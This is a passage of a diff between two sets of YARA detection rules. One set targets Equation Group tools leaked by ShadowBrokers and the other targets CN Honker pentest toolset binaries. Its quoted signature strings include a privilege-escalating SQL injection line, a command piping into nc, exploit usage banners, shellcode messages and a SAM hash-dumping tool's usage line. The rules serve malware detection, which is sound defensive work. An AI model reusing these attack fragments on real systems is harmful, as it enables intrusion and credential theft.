+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1082-L1098"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9323ef0c76348d242b010cf0f1c6a1bf5dd120a02418350bb0ed137f468ac624"
-		score = 75
-		quality = 85
+		hash = "dccd163e94a774b01f90c1e79f186894e2f27de3"
+		logic_hash = "66a77c1fbfecdc02f591c12f69b46e39b7077dfbb5ed2a26a7dcfb11c8b464dc"
+		score = 70
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
 
 	strings:
-		$s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii
-		$s6 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
+		$s1 = "update [dv_user] set usergroupid=1 where userid=2;--" fullword ascii
+		$s2 = "To.exe" fullword wide
+		$s3 = "by zj1244" ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Envisioncollision : FILE
+rule SIGNATURE_BASE_CN_Honker_Grouppolicyremover : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision"
+		description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d512d9a-45a5-514a-bee1-a364beeaf560"
-		date = "2017-04-08"
+		id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L485-L501"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1100-L1116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8cd8c24b212ca71feb6093682fc614c88790c10d7c7d72dac65b047e5791894a"
-		score = 75
+		hash = "7475d694e189b35899a2baa462957ac3687513e5"
+		logic_hash = "936d5dea2d44f638abfb5e42f45c0678bcbf769b575b5056db1a1fc41d1643be"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1"
 
 	strings:
-		$x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii
-		$x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii
-		$s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii
-		$s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";" fullword ascii
+		$s0 = "GP_killer.EXE" fullword wide
+		$s1 = "GP_killer Microsoft " fullword wide
+		$s2 = "SHDeleteKeyA" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cmsex : FILE
+rule SIGNATURE_BASE_CN_Honker_Wordpressscanner : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex"
+		description = "Sample from CN Honker Pentest Toolset - file WordpressScanner.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a1051a5-3f31-5fc2-85a0-beb2dea962d6"
-		date = "2017-04-08"
+		id = "79195823-f88b-5c28-8b99-a43a9d6c94af"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L503-L520"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1118-L1135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "997e08a49c5ae82bcc590e5febd449a4d3e9098f5aa154ccc0824b976f0a6365"
-		score = 75
+		hash = "0b3c5015ba3616cbc616fc9ba805fea73e98bc83"
+		logic_hash = "c6c36ad5ff0ddfbc41464008d293d453bf2d312a6db885217785adf816bd8b20"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810"
 
 	strings:
-		$x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " fullword ascii
-		$x2 = "-i target ip address / hostname " fullword ascii
-		$x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii
-		$x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii
-		$x5 = "If one choice fails, you may want to try another." fullword ascii
+		$s0 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s1 = "(http://www.eyuyan.com)" fullword wide
+		$s2 = "GetConnectString" fullword ascii
+		$s4 = "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of ( $x* ) ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Exze : FILE
+rule SIGNATURE_BASE_CN_Honker_Htran_V2_40_Htran20 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file exze"
+		description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d452b952-0c4a-501b-93f5-064d13f2c08e"
-		date = "2017-04-08"
+		id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L522-L537"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1137-L1156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b8678f58da689be9507a345b6b80ece6cdb7a78d73db339bdc15ad0a66b4a2e6"
-		score = 75
+		hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
+		logic_hash = "41a85430875df622e7940ef26c6eceaa4e0720b2995521fbb2d4b072207c8e15"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876"
 
 	strings:
-		$s1 = "shellFile" fullword ascii
-		$s2 = "completed.1" fullword ascii
-		$s3 = "zeke_remove" fullword ascii
+		$s1 = "%s -slave  ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii
+		$s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
+		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s4 = "%s -connect ConnectHost [ConnectPort]       Default:%d" fullword ascii
+		$s5 = "[+] got, ip:%s, port:%d" fullword ascii
+		$s6 = "[-] There is a error...Create a new connection." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 80KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_DUL : FILE
+rule SIGNATURE_BASE_CN_Honker_Dictionarygenerator : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file DUL"
+		description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6dd90b30-30cb-531c-b8e2-fc208b21e8e6"
-		date = "2017-04-08"
+		id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L539-L553"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1158-L1173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "55df9a844352babf0c30075139e2a62cbf9db898280546d27b172e4d611ce1c0"
-		score = 75
+		hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
+		logic_hash = "228bdbca3eb206e22a130e91caa2486174efba9356dbee67e80333c0cf0bb643"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e"
 
 	strings:
-		$x1 = "?Usage: %s <shellcode> <output_file>" fullword ascii
-		$x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii
+		$s1 = "`PasswordBuilder" fullword ascii
+		$s2 = "cracker" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3650KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Slugger2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Ms11080_Withcmd : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2"
+		description = "Sample from CN Honker Pentest Toolset - file ms11080_withcmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3787a39e-0123-5b46-90c9-6b772b1fd96c"
-		date = "2017-04-08"
+		id = "38c12697-7e52-5713-a566-6047abfa229b"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L555-L574"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1175-L1190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c736fdfa96d5e99bc4d093c03a81b8a4f58501ec8c03a2891f9f694d88b5284"
-		score = 75
+		hash = "745e5058acff27b09cfd6169caf6e45097881a49"
+		logic_hash = "1f673f845ad40efae143ec244c7c70d1e26fb51f22be6bf445085c6a7379f193"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf"
 
 	strings:
-		$x1 = "usage: %s hostip port cmd [printer_name]" fullword ascii
-		$x2 = "command must be less than 61 chars" fullword ascii
-		$s1 = "__rw_read_waiting" ascii
-		$s2 = "completed.1" fullword ascii
-		$s3 = "__mutexkind" ascii
-		$s4 = "__rw_pshared" ascii
+		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
+		$s3 = "[>] create pipe error" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 50KB and ( 4 of them and 1 of ( $x* ) ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 340KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Ebbisland : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V2 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland"
+		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d30b9f26-c2c5-5ecb-9f63-e96017788e40"
-		date = "2017-04-08"
+		id = "499b251a-e0e1-5550-825d-acab112be74b"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L576-L594"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1192-L1208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1f4b5054d4239e23146f0764ffe9037b658ecdb9a5f479956c5c45abc1012a17"
-		score = 75
+		hash = "a995451d9108687b8892ad630a79660a021d670a"
+		logic_hash = "979f3fe9795798743f2a57aa3b82a34e304774de58ffda5278991cf5a753a8ba"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977"
 
 	strings:
-		$x1 = "Usage: %s [-V] -t <target_ip> -p port" fullword ascii
-		$x2 = "error - shellcode not as expected - unable to fix up" fullword ascii
-		$x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii
-		$x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii
-		$x5 = "-A <jumpAddr> (shellcode address)" fullword ascii
-		$x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s3 = "2011-2012 T00LS&RICES" fullword wide
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Jackpop : FILE
+rule SIGNATURE_BASE_CN_Honker_HASH_32 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop"
+		description = "Sample from CN Honker Pentest Toolset - file 32.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c650752-200b-51e7-95c2-4d385bfd5844"
-		date = "2017-04-08"
+		id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L596-L614"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1210-L1226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6efc4ccd2727f93713ad35dc1f054fa25e976e8c3d95f00226fbd56d7f1ce30b"
-		score = 75
+		hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
+		logic_hash = "819e70979ae1d5e237bbadaa52b504c566b4b7436747ceb0d72e206e4fc45708"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519"
 
 	strings:
-		$x1 = "%x:%d  --> %x:%d %d bytes" fullword ascii
-		$s1 = "client: can't bind to local address, are you root?" fullword ascii
-		$s2 = "Unable to register port" fullword ascii
-		$s3 = "Could not resolve destination" fullword ascii
-		$s4 = "raw troubles" fullword ascii
+		$s5 = "[Undefined OS version]  Major: %d Minor: %d" fullword ascii
+		$s8 = "Try To Run As Administrator ..." fullword ascii
+		$s9 = "Specific LUID NOT found" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Parsescan : FILE
+rule SIGNATURE_BASE_CN_Honker_Windows_Mstsc_Enhanced_RMDSTC : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan"
+		description = "Sample from CN Honker Pentest Toolset - file RMDSTC.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bbe8b518-2bf0-5de4-8fb8-9b8609d393dc"
-		date = "2017-04-08"
+		id = "f6e94327-cb79-5a7a-88bb-850177558978"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L616-L630"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1228-L1243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "25e0bc21f93cd72814cd6114883ed903af84a62dced126201b6037a476dbd2cd"
-		score = 75
+		hash = "3ca2b1b6f31219baf172abcc8f00f07f560e465f"
+		logic_hash = "de676b033613beebfe9fc5a71cf5f5911f0af35d34e77d56d222c6f00114dfb6"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
 
 	strings:
-		$s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii
-		$s2 = "Usage:  $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
+		$s0 = "zava zir5@163.com" fullword wide
+		$s1 = "By newccc" fullword wide
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Jscan : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_Mstsc_MSTSCAX : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file jscan"
+		description = "Sample from CN Honker Pentest Toolset - file MSTSCAX.DLL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c4cebc69-8ec8-5ad7-bd93-55565b3eb92b"
-		date = "2017-04-08"
+		id = "9508b613-f897-5277-97e0-30e36fb5d747"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L632-L646"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1245-L1261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d3bbdb90da9fa5b8b41a8b5d35a9b42e4fa15f291146575b0ef22e81441dcbde"
-		score = 75
+		hash = "2fa006158b2d87b08f1778f032ab1b8e139e02c6"
+		logic_hash = "2bfe10ec4af5d0f32fc03714c0cb01d9b0d446daa67cc0cce0b83f6a57e7c5a5"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe"
 
 	strings:
-		$s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii
-		$s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii
+		$s1 = "ResetPasswordWWWx" fullword ascii
+		$s2 = "Terminal Server Redirected Printer Doc" fullword wide
+		$s3 = "Cleaning temp directory" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Promptkill : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Scanner : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill"
+		description = "Sample from CN Honker Pentest Toolset - file T00ls_scanner.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e0749b10-fa5a-5d73-86e1-e2008e121674"
-		date = "2017-04-08"
+		id = "80d4a950-24cb-55c7-903f-8788a71be7ac"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L648-L662"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1263-L1278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7b46161b8cbb9a539171349b3e2a58f8e5a48c344b6d99020b3e96da9c878771"
-		score = 75
+		hash = "70b04b910d82b32b90cd7f355a0e3e17dd260cb3"
+		logic_hash = "558abb651ce410520811ca96aaad78710cb9bf597b59ed89d9a678377716d721"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d"
 
 	strings:
-		$x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii
-		$x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii
+		$s0 = "http://cn.bing.com/search?first=1&count=50&q=ip:" fullword wide
+		$s17 = "Team:www.t00ls.net" fullword ascii
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 330KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Epoxyresin_V1_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Gethashes : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1"
+		description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "390a13b0-3246-5bf7-8841-775a43045172"
-		date = "2017-04-08"
+		id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L664-L681"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1280-L1296"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c1cbc18f05b299837463aa27a9c47ea0355ca5974b2c6ab1e0a18cc9ad1b26a1"
-		score = 75
-		quality = 83
+		hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
+		logic_hash = "fb5ab5e6d8b522caf27478b0589b39d06b96fb0f913673ede768a814836e11f8"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73"
 
 	strings:
-		$x1 = "[-] kernel not vulnerable" fullword ascii
-		$s1 = ".tmp.%d.XXXXXX" fullword ascii
-		$s2 = "[-] couldn't create temp file" fullword ascii
-		$s3 = "/boot/System.map-%s" fullword ascii
+		$s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii
+		$s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii
+		$s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 30KB and $x1 ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 87KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Estopmoonlit : FILE
+rule SIGNATURE_BASE_CN_Honker_Hashq_Hashq : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit"
+		description = "Sample from CN Honker Pentest Toolset - file Hashq.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7ae7a8b7-5e27-5604-8c57-6d60ffa0fb72"
-		date = "2017-04-08"
+		id = "4f435edf-28bf-5195-bc22-0d2a7302b312"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L683-L699"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1298-L1314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "06293b6f48d2595f3426088cddc4b0c4d1ebc1de90fa640d5b5e806a45a2b6bd"
-		score = 75
+		hash = "7518b647db5275e8a9e0bf4deda3d853cc9d5661"
+		logic_hash = "a71ad182f7dd33790e59badfba6149c6dea627858414f0a8f3e64fd3bb2e2a64"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220"
 
 	strings:
-		$x1 = "[+] shellcode prepared, re-executing" fullword ascii
-		$x2 = "[-] kernel not vulnerable: prctl" fullword ascii
-		$x3 = "[-] shell failed" fullword ascii
-		$x4 = "[!] selinux apparently enforcing.  Continue [y|n]? " fullword ascii
+		$s1 = "Hashq.exe" fullword wide
+		$s5 = "CnCert.Net" fullword wide
+		$s6 = "Md5 query tool" fullword wide
 
 	condition:
-		filesize < 250KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Envoytomato : FILE
+rule SIGNATURE_BASE_CN_Honker_Shiftbackdoor_Server : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato"
+		description = "Sample from CN Honker Pentest Toolset - file Server.dat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d1a43c98-9448-5a03-824d-5cd8e959fbf5"
-		date = "2017-04-08"
+		id = "c53f4015-ad2b-5898-88b5-34b3bc2c65b6"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L701-L715"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1316-L1333"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
